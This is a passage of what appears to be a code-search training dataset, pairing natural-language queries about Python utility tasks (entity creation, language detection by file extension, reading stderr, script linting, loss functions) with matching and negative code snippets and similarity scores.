t.setDaemon(True)\n t.start()\n sleep(2)\n t.join()\n except Exception, ex:\n print ex\n sleep(5)\n if number == 0:\n if theme_type.upper() == 'VLIFE':\n vlife_theme_path = theme_config.getValue(dname, 'vlife_theme_path').split('|')\n elif theme_type.upper() == 'SYSTEM':\n vlife_theme_path = theme_config.getValue(dname, 'system_theme_path').split('|')\n else:\n vlife_theme_path = theme_config.getValue(dname, 'third_party_theme_path').split('|')\n else:\n tag = 'vlife_theme_path_' + str(number)\n vlife_theme_path = theme_config.getValue(dname, tag).split('|')\n\n width, height = DEVICE.get_screen_normal_size()\n\n try:\n\n for text in vlife_theme_path:\n # try to swipe screen multiple times\n if text.startswith('NAME'):\n search_text = text.split('_')[1]\n for i in range(5):\n result = click_text(dname, search_text)\n if result:\n break\n else:\n # swipe screen\n cmd = 'input swipe {0} {1} {2} {3} 200'.format(int(width)/2, int(height)/2, int(width)/2, int(height)/2-300)\n DEVICE.shell(cmd)\n sleep(1)\n else:\n click_text(dname,text)\n\n # for i in range(3):\n # x = 0\n # y = 0\n # element = myuiautomator.Element(dname)\n # event = myuiautomator.Event(dname)\n # if text.find(':') == -1:\n # value = unicode(text)\n # # because there is not 'click' action on text, so have to click next to element\n # else:\n # value = unicode(text.split(':')[0])\n # x = text.split(':')[1]\n # y = text.split(':')[2]\n # ele = element.findElementByName(value)\n # if ele is not None:\n # event.touch(ele[0]-int(x), ele[1]-int(y))\n # sleep(2)\n # break\n # else:\n # # swipe screen\n # cmd = 'input swipe {0} {1} {2} {3} 200'.format(int(width)/2, int(height)/2, int(width)/2, int(height)/2-300)\n # DEVICE.shell(cmd)\n # sleep(1)\n\n except Exception,ex:\n print ex\n # return to HOME\n for i in range(3):\n DEVICE.send_keyevent(4)", "def set_light_on(self):\r\n self._light = \"ON\"", "def main():\r\n root = tk.Tk()\r\n app = Home(root)\r\n root.geometry(app.resize())\r\n root.configure(background = jt.color_background)\r\n root.mainloop()" ]
[ "0.73362345", "0.7268235", "0.6951579", "0.6824019", "0.67134887", "0.61943114", "0.61578697", "0.61033326", "0.6091632", "0.6071398", "0.60527337", "0.5875625", "0.5875625", "0.58475655", "0.57241774", "0.57137465", "0.5653085", "0.5578202", "0.54841846", "0.54613185", "0.5428388", "0.54159576", "0.5393109", "0.5342636", "0.5280186", "0.5220907", "0.52142525", "0.51548755", "0.51536065", "0.51469064" ]
0.743344
0
Create a new entity, returning the UUID of the created record
def create_entity(data: dict) -> str: new_uuid = str(uuid4()) Entity.create(uuid=new_uuid, data=data["data"]) return new_uuid
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _create_instance(**kwargs):\n ctxt = context.get_admin_context()\n return db.instance_create(ctxt, _create_instance_dict(**kwargs))['id']", "def new(self):\n uuid = uuid4().hex\n cur = self.conn.cursor()\n cur.execute(\n \"\"\"\n INSERT INTO experiments (uuid)\n VALUES(?)\n \"\"\", [uuid])\n cur.close()\n self.conn.commit()\n return uuid", "def _create_entity(self, model_name, entity):\n model_pool = self.pool.get(model_name)\n prepared_entity = self._prepare_entity(model_name, entity)\n if not prepared_entity:\n logger.debug(\"Prepared entity is empty : %s model %s\" % (prepared_entity, model_name))\n return False\n\n logger.debug(\"Creating entity %s\\n%s\" % (model_name, prepared_entity))\n new_id = model_pool.create(self.cr, self.uid, prepared_entity)\n\n logger.debug(\"Created %s, id %s\" % (model_name, new_id))\n return new_id", "def create(cls, **kwargs):\n instance = cls(**kwargs)\n return instance.save().serialize()", "async def create(self, payload):\n\n async with self.db.manager.database.transaction():\n obj = await self._expand(await self.db.create(**payload))\n self.log.info(f\"New {self.db_model_name}: {obj}\")\n return obj", "def create(cls, dump, model, pid_provider, legacy_id_key=\"legacy_recid\"):\n record = cls.create_record(\n dump, model, pid_provider, legacy_id_key=legacy_id_key\n )\n return record", "def create():", "def create():", "def _create(cls, model_class, *args, **kwargs):\n for k in kwargs.keys():\n if k in model_class.relationships():\n rel_key = '{}_id'.format(k)\n kwargs[rel_key] = str(kwargs[k].id)\n obj = super(BaseFactory, cls)._create(model_class, *args, **kwargs)\n obj.save(obj)\n return obj", "def test_uuid_created():\n assert type(sc.current.id) == str", "def create(self):\n ...", "def create_tag_id():\n return uuid.uuid1().int", "def create():\n pass", "def create(self):", "def test_create(self):\n\n res = self.metadata.create_or_update(data=self.create)\n\n self.assertEqual(res.name, self.entity.name)\n self.assertEqual(res.service.id, self.entity.service.id)\n self.assertEqual(res.owner, None)", "def _create(self, **attributes: Dict[str, object]) -> str:\n pass", "def insert(self):\n item = self.create()\n return item.id", "def test_create_record(self):\n pass", "def create_person(self):", "def create(cls, **kwargs):\n instance = cls(**kwargs)\n return instance.save()", "def create(cls, **kwargs):\n instance = cls(**kwargs)\n return instance.save()", "def create(cls, **kwargs):\n instance = cls(**kwargs)\n return instance.save()", "def _generate_uuid(self):\n\n return uuid.uuid4()", "def create_id():\n unique_id = UniqueId()\n unique_id.put()\n return unique_id.key().id()", "def create_id():\n unique_id = UniqueId()\n unique_id.put()\n return unique_id.key().id()", "def create(self):\n\n pass", "def createRecord(self):\n self.dto.getRecord().append(self.controller.createNewObj())\n print(\"Record added.\")", "def get_or_create_unique_id(self):\n if not self.unique_id:\n self.unique_id = uuid.uuid4().hex\n return self.unique_id", "def test_create_identity(self):\n pass", "async def create(self, payload):\n\n return await self.creator.write(payload)" ]
[ "0.6654303", "0.6614401", "0.6504342", "0.64369875", "0.6267132", "0.6234407", "0.62021786", "0.62021786", "0.61904436", "0.6179102", "0.613219", "0.61154836", "0.60848325", "0.6072805", "0.60569495", "0.6037746", "0.6018132", "0.6005871", "0.6001378", "0.59915316", "0.59915316", "0.59915316", "0.5991292", "0.59725755", "0.59725755", "0.5938451", "0.59308", "0.59297955", "0.5913915", "0.5903627" ]
0.7855162
0
Determine the language used based on the extension
def identifyLangage(script):
    langage = "undefined"

    scriptNameInArray = script.split(".")
    extension = scriptNameInArray[-1]

    if(extension == "pl"):
        langage = "perl"
    elif(extension == "py"):
        langage = "python"
    elif(extension == "sh"):
        langage = "bash"
    else:
        langage = "not recognised"

    return langage
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_lang(self):\n return self.langs.lang", "def get_language(self, article):\r\n # we don't want to force the target laguage\r\n # so we use the article.meta_lang\r\n if self.config.use_meta_language == True:\r\n if article.meta_lang:\r\n return article.meta_lang[:2]\r\n return self.config.target_language", "def get_language(self):\n return self.lang", "def srclang(self):\n return self.__srclang", "def init_language(self):\n\n if 'HTTP_COOKIE' in os.environ:\n cookies = os.environ['HTTP_COOKIE'].split(';')\n for cookie in cookies:\n (key, value) = cookie.split('=')\n if key == Intuition.COOKIE_USERLANG:\n return value\n \n return self.default_language", "def lang(self):\n return self._lang", "def get_lang(self):\n\n path = self.get_lang_path()\n for language in self.languages:\n if language in path:\n return language", "def get_language(fn):\n # FIXME - this expects the fn to be '.../XX/LC_MESSAGES/messages.po'\n return fn.split(os.sep)[-3]", "def get_locale():\n return \"he\"", "def get_meta_lang(self):\n # we have a lang attribute in html\n attr = self.parser.getAttribute(self.article.doc, attr='lang')\n if attr is None:\n # look up for a Content-Language in meta\n items = [\n {'tag': 'meta', 'attr': 'http-equiv', 'value': 'content-language'},\n {'tag': 'meta', 'attr': 'name', 'value': 'lang'}\n ]\n for item in items:\n meta = self.parser.getElementsByTag(self.article.doc, **item)\n if meta:\n attr = self.parser.getAttribute(meta[0], attr='content')\n break\n\n if attr:\n value = attr[:2]\n if re.search(RE_LANG, value):\n return value.lower()\n\n return None", "def get_language(self):\r\n return self.language", "def get_lang(self):\n props = getToolByName(self.context,\n 'portal_properties')\n return props.site_properties.getProperty('default_language') or 'en'", "def language(self):\n lang = None\n if self.__dict__['TAG:language']:\n lang = self.__dict__['TAG:language']\n return lang", "def get_lang(ix):\n\tlang = None\n\tif ix == 0:\n\t\tlang = setting.TLA_ENG\n\telif ix == 1:\n\t\tlang = setting.TLA_JP\n\telse:\n\t\tlang = setting.TLA_VN\n\n\tf = open (f\"lang\\\\{lang}.json\", encoding=setting.TLA_UTF8)\n\tglobal data_json\n\tdata_json = json.load(f)\n\n\treturn lang", "def get_language(self, text):\n try:\n post_lang = detect(text)\n except:\n post_lang = 'N/A'\n return post_lang", "def get_language(self) -> str:\n return self.language", "def language(self, target):\n self._check_target(target)\n return target.language or self._default_language", "def language(self):\n if \"language\" in self._prop_dict:\n return self._prop_dict[\"language\"]\n else:\n return None", "def getMetaLang(self, article):\n # we have a lang attribute in html\n attr = Parser.getAttribute(article.doc, attr='lang')\n if attr is None:\n # look up for a Content-Language in meta\n kwargs = {'tag':'meta',\n 'attr':' http-equiv',\n 'value':'content-language'}\n meta = Parser.getElementsByTag(article.doc, **kwargs)\n if meta:\n attr = Parser.getAttribute(meta[0], attr='content')\n \n if attr:\n value = attr[:2]\n if re.search(RE_LANG, value):\n return value.lower()\n \n return None", "def get_language(self, article):\r\n # we don't want to force the target laguage\r\n # so we use the article.meta_lang\r\n if self.config.use_meta_language == True:\r\n if article.meta_lang:\r\n self.language = article.meta_lang[:2]\r\n self.language = self.config.target_language", "def use_en(self):\n pass", "def get_project_lang(self):\n return self.project_name_lang.currentText() # .replace(\"é\",\"e\").lower()", "def 
language(self):\r\n return self._get('language', {})", "def lang_genoeg(lengte):\n return", "def get_meta_lang(self, article):\r\n # we have a lang attribute in html\r\n attr = self.parser.getAttribute(article.doc, attr='lang')\r\n if attr is None:\r\n # look up for a Content-Language in meta\r\n items = [\r\n {'tag': 'meta', 'attr': 'http-equiv', 'value': 'content-language'},\r\n {'tag': 'meta', 'attr': 'name', 'value': 'lang'}\r\n ]\r\n for item in items:\r\n meta = self.parser.getElementsByTag(article.doc, **item)\r\n if meta:\r\n attr = self.parser.getAttribute(meta[0], attr='content')\r\n break\r\n\r\n if attr:\r\n value = attr[:2]\r\n if re.search(RE_LANG, value):\r\n return value.lower()\r\n\r\n return None", "def get_language():\n try:\n from leaves.middleware import request_context\n return request_context.language\n except:\n return get_site().preferences.default_language", "def _getLang(self, language):\n if language == None:\n language = self.getDefaultLanguage()\n\n return language", "def _get_lang(self, *args, **kwargs):\n if \"lang\" in kwargs:\n if kwargs[\"lang\"] in self._available_languages:\n self.lang = kwargs[\"lang\"]", "def get_language(self, word, lang=None):\n lang = lang or self.cfg.get('lang', 'en')\n # let's retrieve the word from configuration dict.\n try:\n return self.cfg['words_' + lang][word]\n except StandardError:\n return 'Do not know how to \"{}\" in \"{}\"'.format(word, lang)", "def get_language(self) -> str:\n return settings.LANGUAGE_CODE" ]
[ "0.717291", "0.71475804", "0.70080835", "0.70027035", "0.69902664", "0.698173", "0.6898868", "0.6871327", "0.6855876", "0.68457574", "0.6826537", "0.6808138", "0.6802423", "0.6731631", "0.6702847", "0.668899", "0.664422", "0.6610783", "0.6597736", "0.6578168", "0.65664876", "0.6543513", "0.65301687", "0.6521221", "0.64974016", "0.6491613", "0.64822537", "0.6477741", "0.64712894", "0.64520067" ]
0.75546545
0
Get the stderr of a script
def getErrors(script): p = subprocess.Popen(['./'+script], stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = p.communicate() return err
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_stderr(self):\n return self._get_log('stderr')", "def stderr(self) -> str:\n _args: list[Arg] = []\n _ctx = self._select(\"stderr\", _args)\n return _ctx.execute_sync(str)", "def result_stderr(result):\n return result[1][1]", "def stderr(self):\n return self.__stderr", "def get_stderr(self):\n stderr = [val.get_stderr() for val in self._args_list]\n return '\\n'.join(stderr)", "def get_stderr(self) :\n\t\tif self.__stderr is not None :\n\t\t\tself.__stderr.flush()\n\t\t\treturn self.__stderr.getvalue()", "def stderr(self):\n if self._stderr is None:\n stderr = [p.stderr.read() for p in self.processes if p.stderr]\n output = b'\\n'.join(stderr).strip()\n if not isinstance(output, str):\n output = output.decode(self.encoding, 'ignore')\n self._stderr = output\n return self._stderr", "def get_stderr(self):\n _ = self.get() # force finished wait\n if self._stderr is not None:\n if wait_until_exists(self._stderr):\n with open(self._stderr) as f:\n self._err = f.read()\n return self._err", "def stderr(self: \"ShellOutput\") -> Artefact[bytes]:\n self.__check_len()\n return self.stderrs[0]", "def stderr(self):\n if self._uuid is None:\n return \"\"\n resp = self._connection._get(\n get_url('task stderr', uuid=self._uuid))\n\n if resp.status_code == 404:\n raise MissingTaskException(resp.json()['message'])\n\n raise_on_error(resp)\n return resp.text", "def stderr(self, stderr: str) -> Tuple[List[Message], List[AnnotateCode], str]:\n return [], [], stderr", "def fresh_stderr(self):\n if self._uuid is None:\n return \"\"\n resp = self._connection._post(\n get_url('task stderr', uuid=self._uuid))\n\n if resp.status_code == 404:\n raise MissingTaskException(resp.json()['message'])\n\n raise_on_error(resp)\n return resp.text", "def stderr_path(self):\n return self.log_path\n # return self.path / 'stderr.txt'", "def __readStderr(self):\n if self.process is not None:\n self.errorGroup.show()\n s = str(self.process.readAllStandardError(),\n Preferences.getSystem(\"IOEncoding\"),\n 'replace')\n self.errors.insertPlainText(s)\n self.errors.ensureCursorVisible()", "def err(self):\n return self._err.getvalue()", "def std_err(self):\n return self._std_err", "def stderr(username, root_wf_id, wf_id, job_id, job_instance_id):\n dashboard = Dashboard(g.master_db_url, root_wf_id, wf_id)\n text = dashboard.get_stderr(wf_id, job_id, job_instance_id)\n\n if text.stderr_text == None:\n return 'No Standard error for workflow ' + wf_id + ' job-id ' + job_id\n else:\n return '<pre>%s</pre>' % utils.unquote(text.stderr_text)", "def geterr():\n return __errprof.state.copy()", "def get_output_error(cmd, **kwargs):\n if not isinstance(cmd, list):\n cmd = [cmd]\n logging.debug(\"Running: %s\", ' '.join(map(quote, cmd)))\n try:\n result = Popen(cmd, stdout=PIPE, stderr=PIPE, **kwargs)\n except OSError as e:\n return -1, '', f'Failed to run {cmd!r}: {e!r}'\n so, se = result.communicate()\n # unicode:\n so = so.decode('utf8', 'replace')\n se = se.decode('utf8', 'replace')\n\n return result.returncode, so, se", "def stderr_output(cmd):\n\n handle, gpg_stderr = stderr_handle()\n try:\n output = subprocess.check_output(cmd, stderr=gpg_stderr) # nosec\n if handle:\n handle.close()\n\n return str(polite_string(output))\n except subprocess.CalledProcessError as exception:\n LOGGER.debug(\"GPG Command %s\", ' '.join(exception.cmd))\n LOGGER.debug(\"GPG Output %s\", exception.output)\n raise CryptoritoError('GPG Execution')", "def err(string, exitval):\n\tprint >> sys.stderr, string.rstrip()\n\tsys.exit(exitval)", "def 
geterror(self):\n c = [self.nsdchat, '-s', self.connection_string, '-c', 'geterror']\n process = subprocess.Popen(\n c, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n try:\n out, err = process.communicate()\n except subprocess.TimeoutExpired:\n process.kill()\n raise\n if (process.returncode != 0):\n Connection.logger.error(\"nsdchat exited with errorcode \"\n \"{rc}.\".format(rc=process.returncode))\n else:\n return out.decode('utf-8')", "def errors(self):\n return self.args[1]", "def readProcessStderrLog(self, name, offset, length):\r\n self._update('readProcessStderrLog')\r\n return self._readProcessLog(name, offset, length, 'stderr')", "def get_exitcode_stdout_stderr(cmd):\n args = shlex.split(cmd)\n\n proc = Popen(args, stdout=PIPE, stderr=PIPE)\n out, err = proc.communicate()\n exitcode = proc.returncode\n #\n # return exitcode, out.decode(\"utf-8\"), err\n return out.decode(\"utf-8\")", "def error(self) -> list:\n return self.__err", "def get_stderr(self, save=True, delete_file=None, update=True):\n _logme.log(('Getting stderr, save={}, auto_delete={}, '\n 'delete_file={}').format(\n save, self.auto_delete, delete_file\n ), 'debug')\n if delete_file is None:\n delete_file = self.clean_outputs\n if self.done and self._got_stderr:\n _logme.log('Getting stderr from _stderr', 'debug')\n return self._stderr\n if update and not self._updating and not self.done:\n self.update()\n if not self.done:\n _logme.log('Job not done, attempting to get current STDERR ' +\n 'anyway', 'info')\n _logme.log('Getting stderr from {}'.format(self.kwargs['errfile']),\n 'debug')\n if _os.path.isfile(self.kwargs['errfile']):\n stderr = open(self.kwargs['errfile']).read()\n if delete_file is True or self.auto_delete is True:\n _logme.log('Deleting {}'.format(self.kwargs['errfile']),\n 'debug')\n _os.remove(self.kwargs['errfile'])\n if save:\n self._stderr = stderr\n if self.done:\n self._got_stderr = True\n return stderr\n else:\n _logme.log('No file at {}, cannot get stderr'\n .format(self.kwargs['errfile']), 'warn')\n return None", "def get_error_log(self) -> Any:\n return self.err", "def errorCheck(sh, returncode, stderr):\n\tif returncode!=0 or stderr!='':\n\t\tif config.DEBUG:\n\t\t\tmsg = \"sh code execution [%s] returned non-zero exit status [%s] and/or non-empty stdterr [%s]\" % (repr(sh), returncode, repr(stderr.strip()))\n\t\telse:\n\t\t\tmsg = \"sh code execution returned non-zero exit status and/or non-empty stdterr\"\n\t\traise Exception(msg)", "def do_get_error(self):\n if self._last_exception is None:\n print('no errors')\n else:\n traceback.print_exception(*self._last_exception)" ]
[ "0.80331707", "0.77476525", "0.77177006", "0.7631188", "0.73205614", "0.72101223", "0.7183124", "0.7134146", "0.7087779", "0.70248073", "0.6913695", "0.6896512", "0.6791896", "0.66601497", "0.66361713", "0.65947324", "0.64891607", "0.64813185", "0.63999623", "0.6331216", "0.6231364", "0.62112457", "0.61965394", "0.61763775", "0.6168094", "0.61588836", "0.6155056", "0.615473", "0.61277765", "0.6126049" ]
0.79301566
1
Scan a script for simple errors
def scanForSimpleError(script):
    langage = identifyLangage(script)
    line_number = 0
    logFile_name = "scan.log"

    # Scanning File
    logFile = open(logFile_name, 'w')
    scriptFile = open(script, 'r')
    for line in scriptFile:
        line_number += 1
        lineWithoutBackN = line.replace("\n", "")
        lineInArray = lineWithoutBackN.split(" ")
        lastWord = lineInArray[-1]
        lastWordInArray = list(lastWord)
        lineInCharacterArray = list(lineWithoutBackN)

        #########################
        # looking for a shebang #
        # => for perl           #
        # => for bash           #
        #########################
        if(langage == "perl" and line_number == 1 and lineInArray[0] != "#!/usr/bin/perl"):
            logFile.write("[WARNING]: SET line "+str(line_number)+" TO #!/usr/bin/perl\n")
        if(langage == "bash" and line_number == 1 and lineWithoutBackN != "#!/bin/bash"):
            logFile.write("[WARNING]: SET line "+str(line_number)+" TO #!/bin/bash\n")

        #########################
        # Check for semicolon   #
        # => for perl           #
        #########################
        if(len(lastWordInArray) > 0):
            if(langage == "perl" and line_number != 1 and lastWordInArray[-1] != ";"):
                if(lastWord != "}"):
                    firstNonEmptyCharacter = getFirstNonEmptyCharInArray(lineInCharacterArray)
                    if(firstNonEmptyCharacter != "#"):
                        logFile.write("[ERROR]: ADD \";\" to line "+str(line_number)+"\n")

        #################################
        # Check variable declaration    #
        # => for perl                   #
        #################################
        if(getFirstNonEmptyCharInArray(lineInCharacterArray) != "#"):
            word_number = 0
            for word in lineInArray:
                if(word == "my"):
                    variable = lineInArray[word_number+1]
                    variableInArray = list(variable)
                    if(variableInArray[0] != "$" and variableInArray[0] != "@"):
                        if "list" in variable:
                            logFile.write("[ERROR]: ADD \"@\" to "+variable+", line "+str(line_number)+"\n")
                        else:
                            logFile.write("[ERROR]: ADD \"$\" to "+variable+", line "+str(line_number)+"\n")
                word_number += 1

    scriptFile.close()
    logFile.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def scan_error(self, line: int, message: str):\n self.report(line, \"\", message)", "def error_check(command):\r\n\r\n # TODO\r", "def check_errors(self) -> None:", "def check_errors():\n\n for error in errors:\n ERROR('%s' % str(error))\n\n if len(errors) != 0:\n sys.exit(1)", "def parse_lspci_vv_chk_error(output,raiseOnErrors = \"1\"):\n \n found_devSta = 0\n \n #sys.exit(1)\n if re.search(\"DevSta\",output):\n found_devSta = 1\n \n # remove DevStat after splitting it\n l_a = output.split(\":\")\n l_a1 = l_a[1].split()\n for m in l_a1:\n \n # if ends with +, \n if re.search(\"Err\",m):\n if re.search(\".*\\+$\",m):\n \n print \"-\" * 8\n \n errorStr = \"Found + in lspci output for '%s' , line details '%s'\"%(m,output)\n trace_error(errorStr)\n if raiseOnErrors == \"1\":\n raise ViriError(errorStr)\n\n return 2\n \n if found_devSta == 0:\n raise ViriError(\"Did not find 'devSta' in the output %s\"%output)\n\n trace_info(\"No lspci correctable or uncorrectable issues seem to be present , output '%s'\"%output)\n return 1", "def check_for_errors(self):\n\n with open(\"output.dat\", \"r\") as log:\n for line in log:\n if \"*** Psi4 exiting successfully.\" in line:\n return {\"success\": True}\n\n elif \"*** Psi4 encountered an error.\" in line:\n return {\"success\": False, \"error\": \"Not known\"}\n\n return {\"success\": False, \"error\": \"Segfault\"}", "def check_errors(self):\n\n errors = []\n while True:\n err = self.values(\"SYST:ERR?\")\n if int(err[0]) != 0:\n errmsg = \"Agilent 5313xA: {0}: {1}\".format(err[0], err[1])\n log.error(errmsg + '\\n')\n errors.append(errmsg)\n else:\n break\n\n return errors", "def cmd_error_check(self, cmd_out):\n for err in self.err_strings:\n if re.search('\\\\b%s\\\\b' % (err), cmd_out, re.I):\n _log.info(cmd_out)\n _log.info(\n \"Cmd execution failed! with this Return Error: \\n%s\" % (\n cmd_out))\n return 0", "def call_error():\r\n print(\"Error in input format.\")\r\n sys.exit()", "def check_errors(stderr):\n for ee in err_regex:\n if ee['re'].search(stderr) is not None:\n raise RuntimeError(ee['message'])", "def get_errors(cursor):\n while True:\n message = cursor.lpop(\"errors\")\n if message is None:\n print(\"There are no errors more\")\n return None\n print(message)", "def errors(conf, daemon):\n # persisted dict interface for long term memory\n errors = Shove('file://{0}'.format(conf.app.errors), protocol=2, flag='r')\n if any(errors):\n print(\"errors found\")\n for path, error in six.iteritems(errors):\n pp(error)\n errors.close()\n exit(1)\n # ⏏ exit the program with an error\n else:\n print(\"no errors found - OK\")\n print()\n errors.close()", "def ERR(self):", "def test_bad_input():\n\n for arg in ['5', 'ch']:\n rv, out = getstatusoutput('{} {}'.format(prg, arg))\n assert rv == 0\n expected = 'I do not know \"{}\".'.format(arg)\n assert out.strip() == expected", "def main():\n\ttest() #test ParseError", "def parser_error(msg):\n global MESSAGES\n if CURRENT_ROW != None:\n msg = \"row \"+str(CURRENT_ROW)+\": \"+msg\n msg += \"<br/>\\n&nbsp;&nbsp;&nbsp;starting with: \"\n for col in range(5):\n val = cellval(CURRENT_ROW, col)\n if val == None:\n val = \"\"\n msg += val+\" | \"\n MESSAGES.append(\"ERROR: \"+msg)", "def run_check_errors(cmd):\n if type(cmd) == str:\n cmd = cmd.split()\n output = subprocess.run(cmd, capture_output=True, text=True)\n if output.stderr != \"\":\n print_cmd = \" \".join(map(str, cmd))\n sys.exit(\n f\"The error {output.stderr} was generated when running {print_cmd}. 
Exiting.\"\n )\n return", "def file_name_check(file_name):\n # Please print out which line of the above program contains an error. E.g. if the bug is on line 4 then print 4\n # END OF CONTEXT\n print(\"9\")\n # END OF SOLUTION", "def test_scan_file(self):\n self.run_scan(self.filename, 1)", "def IdentifySimpleError(langage, errorLog):\n\t\n\tif(langage == \"perl\"):\n\t\terrorLogInArray = errorLog.split(\" \")\n\t\tif(errorLogInArray[0] == \"syntax\" and errorLogInArray[1] == \"error\"):\n\t\t\tif (errorLogInArray[4] == \"line\"):\n\t\t\t\terrorLineInArray = errorLogInArray[5].split(\",\")\n\t\t\t\terrorLine = int(errorLineInArray[0])-1\n\t\t\t\tprint \"ADD \\\";\\\" at the end of line \"+str(errorLine)+\" IF \\\";\\\" is missing\\n\"", "def valid_syntax(command):\n\n for ev, value in bash_iter(command, syntax_check=True):\n if ev == \"err\":\n if value.endswith(\"syntax error: unexpected end of file\"):\n return False\n if \"unexpected EOF while looking for matching\" in value:\n return False\n if \"here-document at line\" in value:\n return False\n return value == 0", "def test_bad_file():\n\n bad = ''.join(random.choices(string.ascii_uppercase + string.digits, k=5))\n rv, out = getstatusoutput(f'{prg} -f {bad}')\n assert rv != 0\n assert re.match('usage:', out, re.I)\n assert re.search(f\"No such file or directory: '{bad}'\", out)", "def checkScriptParses(scriptVersion, script):\n tokenizer = ScriptTokenizer(scriptVersion, script)\n while tokenizer.next():\n pass\n return tokenizer.err", "def parse_syntax_result(result):\n match_result = re.compile(\"(?P<error>\\w+\\s\\w+) at or near\"\n \" '(?P<near>\\S+)', line (?P<line>\\d+), in (?P<module>\\S+)\")\n used_mod_re = re.compile(\"Module:\\s(\\S+)\\s\\s+Errors:\")\n # noinspection SpellCheckingInspection\n error_re = re.compile(\"Errors:\\s+(.*)\\sat\\sor\\snear \")\n\n if \"No issues found!\" in result:\n sys.stdout.write(\"No issues found!\")\n\n if \"Errors\" in result:\n parsed_output = match_result.findall(result)\n used_mod = used_mod_re.findall(result)\n errors = error_re.findall(result)\n\n if parsed_output and used_mod:\n\n for item in parsed_output:\n\n error = (\"Found errors \\'\" + str(errors[0]) + \"\\' in: \" + str(used_mod[0]) +\n \"\\nModule: \" + str(used_mod[0]) + \", Error: \" + str(item[0]) +\n \", Near: \" + str(item[1]) + \", Line: \" + str(item[2] + \"\\n\"))\n\n sys.stderr.write(error)", "def test_err(self, start: Result[int, str], exp: Option[str]) -> None:\n assert start.err() == exp", "def error_analyze(\n self,\n data_dir: Path,\n processed_data_dir: Path,\n result_dir: Path,\n output_report_dir: Path,\n ) -> NoReturn:\n pass", "def error_check(self, message):\n matches = ERROR_SYNTAX.match(message)\n if matches:\n error_code = int(matches.group(1))\n error_message = matches.group(2)\n return error_code, error_message\n return None", "def die_screaming(instr):\n LOG.error(instr)\n sys.exit(1)", "def die_screaming(instr):\n LOG.error(instr)\n sys.exit(1)", "def handle_errors(self, err_list):\n for (etype, err_cde, err_str, err_value, src_line) in err_list:\n if etype == 'isa':\n self.isa_error(err_cde, err_str)\n elif etype == 'gs':\n self.gs_error(err_cde, err_str)\n elif etype == 'st':\n self.st_error(err_cde, err_str)\n elif etype == 'seg':\n self.seg_error(err_cde, err_str, err_value, src_line)" ]
[ "0.6841208", "0.68405724", "0.66131353", "0.6445967", "0.6399118", "0.6177685", "0.61256075", "0.6095763", "0.6076316", "0.6045332", "0.60325944", "0.5948576", "0.5919206", "0.5869653", "0.58674383", "0.58112127", "0.5804113", "0.5793846", "0.57393223", "0.57348496", "0.5731093", "0.57179433", "0.571668", "0.5689055", "0.5682707", "0.56733185", "0.5668128", "0.5656445", "0.5656445", "0.5655577" ]
0.754085
0
Returns the loss function that will be used to train the encoder.
def get_loss_fn(self): raise NotImplementedError()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_loss_fn():\n return reconstruction", "def get_loss(self):\n raise NotImplementedError", "def loss(self):\n return 'mse'", "def loss_op(self):\n return self.loss", "def get_loss_function(loss):\n try:\n\n loss_func_map = {\"sparse_softmax_cross_entropy\": tf.losses.sparse_softmax_cross_entropy,\n \"sigmoid_cross_entropy\": tf.losses.sigmoid_cross_entropy,\n \"softmax_cross_entropy\": tf.losses.softmax_cross_entropy}\n\n except Exception as error:\n raise EnvironmentError(\"get_loss_function: Exception getting loss function: {0}\".format(error))\n\n return loss_func_map[loss]", "def _get_loss(self):\n raise NotImplementedError", "def get_loss_fn(params):\r\n i = importlib.import_module(\"dlex.utils.losses\")\r\n return getattr(i, params.loss)", "def loss(self):\n return self._get(\"loss\")", "def loss(self):\n return self._loss", "def calc_loss(self, codes, encodings):\n return tf.reduce_mean((encodings - tf.stop_gradient(codes)) ** 2)", "def calc_loss(self, codes, encodings):\n return tf.reduce_mean((tf.stop_gradient(encodings) - codes) ** 2)", "def get_loss(self):\r\n\r\n if F.loss_type==\"cosine\":\r\n self.losscos = r2d*tf.acos(1-tf.losses.cosine_distance(tf.nn.l2_normalize(self.labels,1), tf.nn.l2_normalize(self.out, 1), dim=1))\r\n self.loss = tf.losses.cosine_distance(tf.nn.l2_normalize(self.labels,1), tf.nn.l2_normalize(self.out, 1), dim=1)\r\n elif F.loss_type==\"mse2d\":\r\n xl, yl, zl = tf.split(self.labels, 3, axis=1)\r\n xo, yo, zo = tf.split(self.out, 3, axis=1)\r\n thetal, thetao = tf.asin(-yl), tf.asin(-yo)\r\n phil, phio = tf.atan2(-zl, -xl), tf.atan2(-zo, -xo)\r\n self.lb = tf.concat([thetal, phil], axis=1)\r\n self.ob = tf.concat([thetao, phio], axis=1)\r\n self.loss = tf.scalar_mul(tf.constant(r2d), tf.losses.mean_squared_error(self.lb, self.ob, 2))\r\n elif F.loss_type==\"mse3d\":\r\n self.loss = tf.losses.mean_squared_error(tf.nn.l2_normalize(self.labels, 0), tf.nn.l2_normalize(self.out, 0))", "def get_loss(self):\n return categorical_cross_entropy.get_loss(loss_key=self.loss_key,\n output_name=self.args.output_name)", "def loss(self) -> KernelLoss:\n return self._loss", "def _get_loss_function(project_parameters):\n if 'data_weight' in project_parameters:\n weight = torch.Tensor(list(project_parameters.data_weight.values()))\n else:\n weight = None\n return nn.BCELoss(weight=weight) if project_parameters.loss_function == 'BCELoss' else nn.CrossEntropyLoss(weight=weight)", "def get_loss_func(args: Namespace) -> nn.Module:\n if args.dataset_type == 'classification':\n return nn.BCEWithLogitsLoss(reduction='none')\n\n if args.dataset_type == 'regression':\n return nn.MSELoss(reduction='none')\n\n if args.dataset_type == 'multiclass':\n return nn.CrossEntropyLoss(reduction='none')\n\n raise ValueError(f'Dataset type \"{args.dataset_type}\" not supported.')", "def get_loss_funcs():\n\n def _eucl_loss(x, y):\n return K.sum(K.square(x - y)) / batch_size / 2\n\n losses = {}\n losses[\"weight_stage1_L1\"] = _eucl_loss\n losses[\"weight_stage1_L2\"] = _eucl_loss\n losses[\"weight_stage2_L1\"] = _eucl_loss\n losses[\"weight_stage2_L2\"] = _eucl_loss\n losses[\"weight_stage3_L1\"] = _eucl_loss\n 